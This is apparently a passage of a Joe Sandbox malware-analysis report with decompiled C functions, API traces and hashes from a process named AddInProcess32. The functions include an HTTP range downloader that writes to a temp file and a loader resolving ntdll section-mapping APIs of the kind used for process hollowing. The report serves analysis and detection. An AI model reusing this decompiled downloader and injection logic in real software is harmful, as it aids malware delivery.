					MessageBoxW(0, L"ShellRunas context menu handler unregistered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
				}
				return 0;
			}

0x00401941
0x0040194d
0x00401959
0x00401965
0x00401971
0x0040197d
0x00401989
0x00401995
0x004019a1
0x004019ad
0x004019b9
0x004019c5
0x004019cd
0x004019dd
0x004019dd
0x004019e5

APIs

RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command), ref: 00401941
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...), ref: 0040194D
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command), ref: 00401959
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...), ref: 00401965
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...\Command), ref: 00401971
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...), ref: 0040197D
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command), ref: 00401989
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...), ref: 00401995
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command), ref: 004019A1
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...), ref: 004019AD
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command), ref: 004019B9
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...), ref: 004019C5
MessageBoxW.USER32(00000000,ShellRunas context menu handler unregistered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 004019DD

Strings

Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)..., xrefs: 004019BB
Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command, xrefs: 0040197F
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)..., xrefs: 0040195B
Software\Classes\lnkfile\Shell\Run as different user..., xrefs: 00401973
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command, xrefs: 004019AF
Software\Classes\lnkfile\Shell\Run as different user (netonly)..., xrefs: 0040198B
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command, xrefs: 00401997
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004019D1
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command, xrefs: 0040194F
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user..., xrefs: 00401943
Software\Classes\lnkfile\Shell\Run as different user...\Command, xrefs: 00401967
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user..., xrefs: 004019A3
ShellRunas context menu handler unregistered., xrefs: 004019D6
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command, xrefs: 00401937

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: Delete$Message
String ID: ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler unregistered.$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command$Software\Classes\lnkfile\Shell\Run as different user (netonly)...$Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command$Software\Classes\lnkfile\Shell\Run as different user...$Software\Classes\lnkfile\Shell\Run as different user...\Command
API String ID: 3870238891-4209861522
Opcode ID: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
Instruction ID: 5da64dfe4fce38312f7ee7f6f0bbc387e0a5c92d836bb648faa7c577a003e90f
Opcode Fuzzy Hash: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
Instruction Fuzzy Hash: EFF03F70AD5328B9E26023E25D0BFDA7D40CB24BA6F30011B7B4C3509249EA21E5C9EE

Uniqueness

Uniqueness Score: -1.00%

Function 02B51564 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 299
networkmemoryfileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E02B51564(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi, void* __esi, WCHAR* _a4, long _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, WCHAR* _a24, long _a28) {
				signed int _v12;
				short _v144;
				short _v400;
				short _v920;
				WCHAR* _v924;
				long _v928;
				long _v932;
				struct _SECURITY_ATTRIBUTES* _v936;
				struct _OVERLAPPED* _v940;
				void* _v944;
				struct _SECURITY_ATTRIBUTES* _v948;
				void _v952;
				long _v956;
				WCHAR* _v960;
				intOrPtr _v964;
				long _v968;
				intOrPtr _v972;
				signed int _v976;
				WCHAR* _v980;
				void* _v984;
				signed int _t89;
				long _t93;
				int _t111;
				long _t112;
				void* _t114;
				void* _t115;
				int _t128;
				void* _t131;
				void* _t146;
				long _t147;
				intOrPtr _t162;
				struct _OVERLAPPED* _t167;
				intOrPtr _t170;
				signed int _t175;
				void* _t181;
				long _t185;
				void* _t188;
				WCHAR* _t191;
				signed int _t192;
				void* _t193;

				_t89 =  *0x2b56004; // 0xbb40e64e
				_v12 = _t89 ^ _t192;
				_v980 = __edx;
				_v984 = __ecx;
				_v964 = _a20;
				_v924 = _a24;
				_v956 = _a28;
				_t175 = _a16;
				_v960 = _a4;
				_t93 = _a8;
				_v928 = _t93;
				_v972 = _a12 - _t93 + 1;
				_v948 = 0;
				_v920 = 0;
				_v400 = 0;
				_v936 = 0;
				asm("sbb ecx, ecx");
				_v976 = _t175;
				_v940 =  ~_t175 & _t93 + _t175;
				_t181 = 0xffffffff;
				_t146 = HttpOpenRequestW(__ecx, L"GET", __edx, L"HTTP/1.1", 0x2b542bc, 0, _v956, 0);
				_v944 = _t146;
				_v952 = 0x2bf20;
				InternetSetOptionW(_t146, 5,  &_v952, 4);
				InternetSetOptionW(_t146, 6,  &_v952, 4);
				_t147 = 0;
				_v968 = 0;
				_v932 = 0;
				if(_v940 != 0) {
					_push(_a12);
					_t185 = _v928;
					_t147 = _t185;
					_push(_t185);
					L11:
					wsprintfW( &_v144, L"RANGE:bytes=%d-%d\r\n\r\n");
					_t193 = _t193 + 0x10;
					L12:
					_t186 = _v944;
					if(HttpAddRequestHeadersW(_v944,  &_v144, 0xffffffff, 0xa0000000) != 0) {
						if(E02B514D8(_t186) != 0) {
							_t188 = HeapAlloc(GetProcessHeap(), 8, 0x200000);
							_v936 = _t188;
							if(_t188 != 0) {
								while(1) {
									E02B52CE7(_t108, _t188, 0x200000);
									_t111 = InternetReadFile(_v944, _t188, 0x200000,  &_v932);
									_t189 = _t111;
									if(_t111 == 0) {
										break;
									}
									_t112 = _v932;
									_t189 = 0;
									if(_t112 == 0) {
										if(_t147 != _v972) {
											_t162 = _a20;
											_t148 = _v924;
											_a20 = _t162 + 1;
											if(_t162 <= 0x1e) {
												_v948 = 1;
											}
											L28:
											if(_t181 != 0xffffffff) {
												FlushFileBuffers(_t181);
												CloseHandle(_t181);
											}
											_t114 = _v936;
											if(_t114 != 0) {
												HeapFree(GetProcessHeap(), 0, _t114);
											}
											L32:
											_t115 = _v944;
											if(_t115 != 0) {
												InternetCloseHandle(_t115);
											}
											if(_v948 != 0) {
												_t189 = E02B51564(_t148, _v984, _v980, _t181, _t189, _v960, _v928, _a12, _v976, _a20, _t148, _v956);
											}
											return E02B53C33(_v12 ^ _t192);
										}
										_t189 = 1;
										if(_v940 != 0) {
											L27:
											_t148 = _v924;
											goto L28;
										}
										FlushFileBuffers(_t181);
										CloseHandle(_t181);
										_t148 = _v924;
										_t181 = _t181 | 0xffffffff;
										MoveFileExW(_v924, _v960, 1);
										goto L28;
									}
									_v928 = _v928 + _t112;
									_t167 = _v940;
									if(_t167 != 0) {
										E02B52CC6(_t167, _v936, _t112);
										_t108 = _v932;
										_t193 = _t193 + 4;
										_v940 = _t167 + _t108;
										L23:
										_t188 = _v936;
										_t147 = _t147 + _t108;
										continue;
									}
									_t128 = WriteFile(_t181, _v936, _t112,  &_v968, _t167);
									_t189 = _t128;
									if(_t128 == 0) {
										goto L27;
									}
									FlushFileBuffers(_t181);
									_t108 = _v932;
									goto L23;
								}
								_t170 = _a20;
								_a20 = _t170 + 1;
								if(_t170 <= 0x1e) {
									_v948 = 1;
								}
								goto L27;
							}
							goto L13;
						}
						_a20 = _a20 + 1;
						_t131 = 0x1e;
						asm("sbb eax, eax");
						_v948 = _t131 + 1;
						goto L27;
					}
					L13:
					_t189 = 0;
					goto L27;
				}
				_t191 = _v924;
				if( *_t191 != 0) {
					_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 3, 0x80, 0);
					_t189 = 0;
					if(_t181 == 0xffffffff) {
						L4:
						_t148 = _v924;
						goto L32;
					}
					_t147 = SetFilePointer(_t181, 0, 0, 2);
					if(_t147 == 0xffffffff) {
						goto L27;
					}
					if(_t147 == 0) {
						goto L12;
					}
					_push(_a12);
					_v928 = _t147;
					_push(_t147);
					goto L11;
				}
				E02B528DA( &_v400, _t191);
				GetTempPathW(0x104,  &_v920);
				PathAppendW( &_v920,  &_v400);
				E02B52C9C(_t191,  &_v920);
				_t181 = CreateFileW(_t191, 0x40000000, 3, 0, 2, 0x80, 0);
				if(_t181 != 0xffffffff) {
					_push(_a12);
					_push(_v928);
					goto L11;
				} else {
					_t189 = 0;
					goto L4;
				}
			}

0x02b5156d
0x02b51574
0x02b5157c
0x02b51584
0x02b5158d
0x02b51599
0x02b515a2
0x02b515ab
0x02b515ae
0x02b515b6
0x02b515bc
0x02b515c2
0x02b515cc
0x02b515d2
0x02b515d9
0x02b515e4
0x02b515ea
0x02b515ee
0x02b515f6
0x02b51603
0x02b51624
0x02b5162e
0x02b51638
0x02b51642
0x02b51650
0x02b51654
0x02b51656
0x02b5165c
0x02b51668
0x02b51735
0x02b51738
0x02b5173e
0x02b51740
0x02b51741
0x02b5174d
0x02b51753
0x02b51756
0x02b51756
0x02b51773
0x02b51787
0x02b517b7
0x02b517b9
0x02b517c1
0x02b51835
0x02b5183c
0x02b51855
0x02b5185b
0x02b5185f
0x00000000
0x00000000
0x02b517c5
0x02b517cb
0x02b517cf
0x02b51918
0x02b51954
0x02b51959
0x02b51960
0x02b51966
0x02b5196c
0x02b5196c
0x02b51883
0x02b51886
0x02b51889
0x02b51890
0x02b51890
0x02b51896
0x02b5189e
0x02b518aa
0x02b518aa
0x02b518b0
0x02b518b0
0x02b518b8
0x02b518bb
0x02b518bb
0x02b518c8
0x02b518fd
0x02b518fd
0x02b51911
0x02b51911
0x02b5191c
0x02b51924
0x02b5187d
0x02b5187d
0x00000000
0x02b5187d
0x02b5192b
0x02b51932
0x02b51938
0x02b5193e
0x02b51949
0x00000000
0x02b51949
0x02b517d5
0x02b517db
0x02b517e3
0x02b51817
0x02b5181c
0x02b51822
0x02b51827
0x02b5182d
0x02b5182d
0x02b51833
0x00000000
0x02b51833
0x02b517f5
0x02b517fb
0x02b517ff
0x00000000
0x00000000
0x02b51802
0x02b51808
0x00000000
0x02b51808
0x02b51865
0x02b5186b
0x02b51871
0x02b51873
0x02b51873
0x00000000
0x02b51871
0x00000000
0x02b517c3
0x02b51789
0x02b5178e
0x02b51795
0x02b51798
0x00000000
0x02b51798
0x02b51775
0x02b51775
0x00000000
0x02b51775
0x02b5166e
0x02b51677
0x02b51706
0x02b51708
0x02b5170d
0x02b516d9
0x02b516d9
0x00000000
0x02b516d9
0x02b5171a
0x02b5171f
0x00000000
0x00000000
0x02b51727
0x00000000
0x00000000
0x02b51729
0x02b5172c
0x02b51732
0x00000000
0x02b51732
0x02b5167f
0x02b51690
0x02b516a4
0x02b516b2
0x02b516d0
0x02b516d5
0x02b516e4
0x02b516e7
0x00000000
0x02b516d7
0x02b516d7
0x00000000
0x02b516d7

APIs

HttpOpenRequestW.WININET(00000000,GET,?,HTTP/1.1,02B542BC,00000000,?,00000000), ref: 02B51618
InternetSetOptionW.WININET(00000000,00000005,?,00000004), ref: 02B51642
InternetSetOptionW.WININET(00000000,00000006,0002BF20,00000004), ref: 02B51650
GetTempPathW.KERNEL32(00000104,?), ref: 02B51690
PathAppendW.SHLWAPI(?,?), ref: 02B516A4
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02B516CA
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 02B51700
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 02B51714
wsprintfW.USER32 ref: 02B5174D
HttpAddRequestHeadersW.WININET(?,?,000000FF,A0000000), ref: 02B5176B
GetProcessHeap.KERNEL32(00000008,00200000), ref: 02B517AA
HeapAlloc.KERNEL32(00000000), ref: 02B517B1
WriteFile.KERNEL32(00000000,?,?,?,?), ref: 02B517F5
FlushFileBuffers.KERNEL32(00000000), ref: 02B51802
InternetReadFile.WININET(?,00000000,00200000,?), ref: 02B51855
FlushFileBuffers.KERNEL32(00000000), ref: 02B51889
CloseHandle.KERNEL32(00000000), ref: 02B51890
GetProcessHeap.KERNEL32(00000000,?), ref: 02B518A3
HeapFree.KERNEL32(00000000), ref: 02B518AA
InternetCloseHandle.WININET(?), ref: 02B518BB
FlushFileBuffers.KERNEL32(00000000), ref: 02B5192B
CloseHandle.KERNEL32(00000000), ref: 02B51932
MoveFileExW.KERNEL32(?,?,00000001), ref: 02B51949

Part of subcall function 02B528DA: CoCreateGuid.OLE32(?,?), ref: 02B52912
Part of subcall function 02B528DA: wsprintfW.USER32 ref: 02B5298A

Strings

HTTP/1.1, xrefs: 02B5160C
GET, xrefs: 02B51612
RANGE:bytes=%d-%d, xrefs: 02B51747

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: File$HeapInternet$BuffersCloseCreateFlushHandle$HttpOptionPathProcessRequestwsprintf$AllocAppendFreeGuidHeadersMoveOpenPointerReadTempWrite
String ID: GET$HTTP/1.1$RANGE:bytes=%d-%d
API String ID: 685608443-3179785383
Opcode ID: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
Instruction ID: aadcb0b15821b5be8e93155e36f2249f27c9be9795734ce1e2eb123604e298d5
Opcode Fuzzy Hash: 36e1fea52369c1a08e559d012d1a89f80eb01e5636b9c3780a4f63bd54322296
Instruction Fuzzy Hash: 75B14A71E10238AFDB269F68DC44BAA7BB9EF09754F1005D9F94DAB280D7705E908F50

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 165
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00401000(struct HWND__* __edi, void* __eflags) {
				struct HINSTANCE__* _v42;
				intOrPtr _v56;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HWND__* _v72;
				struct tagPD _v76;
				struct HDC__* _v84;
				struct HDC__* _v92;
				struct HDC__* _v100;
				struct HDC__* _v108;
				struct HDC__* _v112;
				struct HDC__* _v116;
				struct _DOCINFOW _v136;
				intOrPtr _v140;
				int _v144;
				signed int _v148;
				struct HICON__* _v152;
				long _v156;
				long _v160;
				struct tagRECT _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				signed int _v188;
				void* _v196;
				void* _v204;
				struct HICON__* _v212;
				intOrPtr _v220;
				int _t69;
				signed int _t72;
				signed int _t76;
				struct HDC__* _t81;
				signed int _t87;
				signed int _t114;
				struct HWND__* _t128;
				long _t132;

				_t128 = __edi;
				E00409280(__edi,  &_v72, 0, 0x3e);
				_v76 = 0x42;
				_v72 = _t128;
				_v42 = GetModuleHandleW(0);
				_v56 = 0x14c;
				_t69 = PrintDlgW( &_v76);
				if(_t69 != 0) {
					_v152 = SetCursor(LoadCursorW(0, 0x7f02));
					_t72 = GetDeviceCaps(_v60, 8);
					_v176.top = GetDeviceCaps(_v68, 0xa);
					_v176.top = GetDeviceCaps(_v76, 0x58);
					_t76 = GetDeviceCaps(_v84, 0x5a);
					_v176.left = 0;
					E00409280(_t128,  &(_v176.top), 0, 0x2c);
					_v136.lpszOutput = 0;
					_v136.lpszDatatype = 0;
					_v136.fwType = 0;
					_v116 = 0;
					_v112 = 0;
					SetMapMode(_v92, 1);
					_t81 = _v100;
					_v184 = _t81;
					_v180 = _t81;
					_v156 = 0;
					_v160 = 0;
					asm("cdq");
					_t114 = _v196 / _t76 * 0x5a0;
					asm("cdq");
					_v176.left = _v160;
					_v148 = _t114;
					_v176.top = _v156;
					_v176.bottom = _t114;
					_t87 = _t72 / _v188 * 0x5a0;
					_v152 = _t87;
					_v176.right = _t87;
					InflateRect( &_v176, 0xfffffa60, 0xfffffa60);
					_v144 = 0;
					_v140 = 0xffffffff;
					_v136.cbSize = 0x14;
					_v136.lpszDocName = L"Sysinternals License";
					StartDocW(_v100,  &_v136);
					_v204 = SendMessageW(_t128, 0xe, 0, 0);
					StartPage(_v108);
					_t132 = SendMessageW(_t128, 0x439, 1,  &_v196);
					EndPage(_v112);
					if(_t132 < _v212) {
						do {
							_v160 = _t132;
							_v156 = 0xffffffff;
							StartPage(_v116);
							_t132 = SendMessageW(_t128, 0x439, 1,  &_v204);
							EndPage(_v136.fwType);
						} while (_t132 < _v220);
					}
					SendMessageW(_t128, 0x439, 0, 0);
					EndDoc(_v116);
					SetCursor(_v212);
					return 1;
				} else {
					return _t69;
				}
			}

0x00401000
0x00401017
0x00401021
0x00401029
0x00401038
0x0040103c
0x00401044
0x0040104c
0x00401075
0x00401079
0x0040108d
0x0040109a
0x0040109e
0x004010ab
0x004010b3
0x004010c4
0x004010c8
0x004010cc
0x004010d0
0x004010d4
0x004010d8
0x004010de
0x004010e2
0x004010e6
0x004010ec
0x004010f0
0x004010f8
0x00401109
0x0040110f
0x00401118
0x00401120
0x00401124
0x00401128
0x0040112c
0x00401132
0x00401136
0x0040113f
0x0040114f
0x00401157
0x0040115f
0x00401167
0x0040116f
0x00401184
0x0040118d
0x004011a7
0x004011a9
0x004011b3
0x004011b5
0x004011ba
0x004011be
0x004011c6
0x004011e0
0x004011e2
0x004011e8
0x004011b5
0x004011f8
0x004011ff
0x0040120a
0x0040121a
0x0040104e
0x00401053
0x00401053

APIs

_memset.LIBCMT ref: 00401017
GetModuleHandleW.KERNEL32 ref: 0040102D
PrintDlgW.COMDLG32(?,?,?,?,?), ref: 00401044
LoadCursorW.USER32(00000000,00007F02), ref: 0040105B
SetCursor.USER32(00000000,?,?,?,?,?), ref: 00401062
GetDeviceCaps.GDI32(?,00000008), ref: 00401079
GetDeviceCaps.GDI32(?,0000000A), ref: 00401084
GetDeviceCaps.GDI32(?,00000058), ref: 00401091
GetDeviceCaps.GDI32(?,0000005A), ref: 0040109E
_memset.LIBCMT ref: 004010B3
SetMapMode.GDI32(?,00000001), ref: 004010D8
InflateRect.USER32(?,?,FFFFFA60), ref: 0040113F
StartDocW.GDI32 ref: 0040116F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00401182
StartPage.GDI32(?), ref: 0040118D
SendMessageW.USER32(?,00000439,00000001,?), ref: 004011A0

Strings

Sysinternals License, xrefs: 00401167
B, xrefs: 00401021

Memory Dump Source

Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd

Similarity

API ID: CapsDevice$CursorMessageSendStart_memset$HandleInflateLoadModeModulePagePrintRect
String ID: B$Sysinternals License
API String ID: 2038973732-3449285610
Opcode ID: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
Instruction ID: bdae98e849ea38a2b48d3d89d57636c7b0b180fdbc1935bf1a89306988cad38c
Opcode Fuzzy Hash: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
Instruction Fuzzy Hash: 16512EB1A48300AFD310DFA9DD45B5BBBE4BB88714F004A2DF689E72A0D774D845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02B52730 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 122
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E02B52730(void* __ebx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v532;
				signed int _t19;
				char _t27;
				_Unknown_base(*)()* _t38;
				void* _t47;
				char _t48;
				signed int _t52;
				void* _t54;
				void* _t61;
				intOrPtr* _t62;
				struct HINSTANCE__* _t63;
				signed int _t66;

				_t61 = __esi;
				_t54 = __edi;
				_t47 = __ebx;
				_t19 =  *0x2b56004; // 0xbb40e64e
				_v8 = _t19 ^ _t66;
				if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 ||  *0x2b59390 == 0) {
					_push(_t47);
					_t48 = 0;
					_v528 = 0;
					if(GetSystemDirectoryA( &_v528, 0x104) != 0) {
						_push(_t61);
						_push(_t54);
						_v268 = 0;
						_v532 = 0;
						_t62 = GetProcAddress(GetModuleHandleW(L"kernel32"), "IsWow64Process");
						if(_t62 != 0) {
							 *_t62(GetCurrentProcess(),  &_v532);
						}
						if(_v532 == _t48) {
							do {
								_t27 =  *((intOrPtr*)(_t66 + _t48 - 0x20c));
								 *((char*)(_t66 + _t48 - 0x108)) = _t27;
								_t48 = _t48 + 1;
							} while (_t27 != 0);
							PathAppendA( &_v268, "ntdll.dll");
						} else {
							_t52 = 7;
							memcpy( &_v268, "X:\\Windows\\SysWOW64\\ntdll.dll", _t52 << 2);
							asm("movsw");
						}
						_v268 = _v528;
						_t63 = LoadLibraryA( &_v268);
						 *0x2b593a4 = GetProcAddress(_t63, "RtlInitUnicodeString");
						 *0x2b593a0 = GetProcAddress(_t63, "ZwOpenFile");
						 *0x2b5939c = GetProcAddress(_t63, "ZwCreateSection");
						 *0x2b59398 = GetProcAddress(_t63, "ZwMapViewOfSection");
						 *0x2b59394 = GetProcAddress(_t63, "NtUnmapViewOfSection");
						_t38 = GetProcAddress(_t63, "NtQueryInformationProcess");
						 *0x2b59390 = _t38;
						if( *0x2b593a4 == 0 ||  *0x2b593a0 == 0 ||  *0x2b5939c == 0 ||  *0x2b59398 == 0 ||  *0x2b59394 == 0 || _t38 == 0) {
							goto L21;
						} else {
						}
					}
				} else {
				}
				return E02B53C33(_v8 ^ _t66);
			}

0x02b52730
0x02b52730
0x02b52730
0x02b52739
0x02b52740
0x02b5274a
0x02b52781
0x02b5278d
0x02b52790
0x02b5279e
0x02b527a4
0x02b527a5
0x02b527b0
0x02b527b6
0x02b527cb
0x02b527cf
0x02b527df
0x02b527df
0x02b527e7
0x02b52803
0x02b52803
0x02b5280a
0x02b52811
0x02b52812
0x02b52822
0x02b527e9
0x02b527eb
0x02b527f7
0x02b527f9
0x02b527fb
0x02b5282e
0x02b52841
0x02b52851
0x02b5285e
0x02b5286b
0x02b52878
0x02b52885
0x02b5288a
0x02b52894
0x02b5289a
0x00000000
0x02b528c4
0x02b528c6
0x02b5289a
0x02b52779
0x02b5277b
0x02b528d9

APIs

GetSystemDirectoryA.KERNEL32 ref: 02B52796
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,00000000,?), ref: 02B527BC
GetProcAddress.KERNEL32(00000000), ref: 02B527C9
GetCurrentProcess.KERNEL32(?), ref: 02B527D8
PathAppendA.SHLWAPI(?,ntdll.dll), ref: 02B52822
LoadLibraryA.KERNEL32(?), ref: 02B5283B
GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 02B52849
GetProcAddress.KERNEL32(00000000,ZwOpenFile), ref: 02B52856
GetProcAddress.KERNEL32(00000000,ZwCreateSection), ref: 02B52863
GetProcAddress.KERNEL32(00000000,ZwMapViewOfSection), ref: 02B52870
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 02B5287D
GetProcAddress.KERNEL32(00000000,NtQueryInformationProcess), ref: 02B5288A

Strings

NtQueryInformationProcess, xrefs: 02B5287F
ZwOpenFile, xrefs: 02B5284B
ntdll.dll, xrefs: 02B52816
Nqt, xrefs: 02B527FB
ZwMapViewOfSection, xrefs: 02B52865
RtlInitUnicodeString, xrefs: 02B52843
X:\Windows\SysWOW64\ntdll.dll, xrefs: 02B527EC
ZwCreateSection, xrefs: 02B52858
kernel32, xrefs: 02B527AB
IsWow64Process, xrefs: 02B527A6
NtUnmapViewOfSection, xrefs: 02B52872

Memory Dump Source

Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true

Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd

Similarity

API ID: AddressProc$AppendCurrentDirectoryHandleLibraryLoadModulePathProcessSystem
String ID: IsWow64Process$NtQueryInformationProcess$NtUnmapViewOfSection$RtlInitUnicodeString$X:\Windows\SysWOW64\ntdll.dll$ZwCreateSection$ZwMapViewOfSection$ZwOpenFile$kernel32$ntdll.dll$Nqt
API String ID: 3757806306-154886105
Opcode ID: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
Instruction ID: e65d43695f34d3b286845e26ba654bf13e13840f8545d0db2b682fdfc816b27a
Opcode Fuzzy Hash: 72957f7d760a3ddb08af6d27586b9eee5e7743c04e2a1989d95e6da7885244d1
Instruction Fuzzy Hash: 0241A330C86734DEEB259FA4A84D79677B4EF04744F1589EAAC05AF190C7B854D4CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE5 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 156
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00406CE5(void* __edx, intOrPtr _a4) {
				long _v4;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* _t9;
				int _t11;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t24;
				void* _t26;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void** _t40;
				void* _t42;
				void* _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;

				_t37 = __edx;
				_t30 = _a4;
				_t38 = 0;
				while(_t30 !=  *((intOrPtr*)(0x4138d0 + _t38 * 8))) {
					_t38 = _t38 + 1;
					if(_t38 < 0x17) {
						continue;
					}
					break;
				}
				if(_t38 >= 0x17) {
					return _t9;
				}
				if(E0040B0DD(3) == 1) {
					L22:
					_t11 = GetStdHandle(0xfffffff4);
					_t45 = _t11;
					if(_t45 != 0 && _t45 != 0xffffffff) {
						_t40 = 0x4138d4 + _t38 * 8;
						_t11 = WriteFile(_t45,  *_t40, E00408FE0( *_t40),  &_v4, 0);
					}
					L25:
					return _t11;
				}
				_t11 = E0040B0DD(3);
				_pop(_t34);
				if(_t11 != 0 ||  *0x413000 != 1) {
					if(_t30 == 0xfc) {
						goto L25;
					}
					_t14 = E0040A659(_t11, _t37, 0x414548, 0x314, "Runtime Error!\n\nProgram: ");
					_t49 = _t48 + 0xc;
					if(_t14 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0x314, _t34, _t37, _t38);
						_t49 = _t49 + 0x14;
					}
					 *0x414665 = 0;
					if(GetModuleFileNameA(0, 0x414561, 0x104) == 0) {
						_t26 = E0040A659(_t15, _t37, 0x414561, 0x2fb, "<program name unknown>");
						_t49 = _t49 + 0xc;
						if(_t26 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00405700(0x314, _t34, _t37, _t38);
							_t49 = _t49 + 0x14;
						}
					}
					_t16 = E00408FE0(0x414561);
					_pop(_t35);
					if(_t16 + 1 <= 0x3c) {
						L16:
						_t42 = 0;
						goto L17;
					} else {
						_t23 = E00408FE0(0x414561) + 0x414526;
						_t35 = 0x41485c - E00408FE0(0x414561) + 0x414526;
						_t24 = E0040A5A6(_t37, _t23, 0x41485c - E00408FE0(0x414561) + 0x414526, "...", 3);
						_t49 = _t49 + 0x14;
						if(_t24 == 0) {
							goto L16;
						}
